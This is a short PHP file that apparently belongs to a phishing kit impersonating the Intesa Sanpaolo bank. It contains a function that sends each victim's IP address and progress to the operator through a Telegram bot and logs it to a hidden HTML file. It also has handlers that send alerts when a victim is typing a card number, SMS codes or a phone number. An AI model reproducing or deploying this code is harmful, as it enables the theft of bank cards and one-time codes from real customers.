<?php 
require './CONFIG2.php';
include "./IP.INFO.php";

function note($statu){
	global $bot_token;
	global $chat_id;
	$c = curl_init();
	curl_setopt($c, CURLOPT_URL, "https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&parse_mode=html&text=".urlencode($LOGS="<b>💬 ••••••••••••••• 🥂 INTESASANPAOLO.STATU 🥂</b>\n[ 🔎 ] * : ".$_SERVER['REMOTE_ADDR']."\n[ ⚙️ ] * : $statu"));
	file_put_contents('../../../ATR480X.html', $LOGS . PHP_EOL, FILE_APPEND);
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
	$res =  curl_exec($c);
	curl_close($c);
	
}


if(isset($_POST['carding'])){
	note("💳 💬 CARD IS BEING ENTERED...");
}
if(isset($_POST['smsing'])){
	note("🔑 💬 SMS IS BEING ENTERED...");
}
if(isset($_POST['smsing2'])){
	note("🔑 💬 SMS.2 IS BEING ENTERED...");
}
if(isset($_POST['teling'])){
	note("☎️ 💬 PHONE IS BEING ENTERED...");
}
if(isset($_POST['smsingg'])){
	note("🔑 💬 SMS IS BEING ENTERED...");
}
?>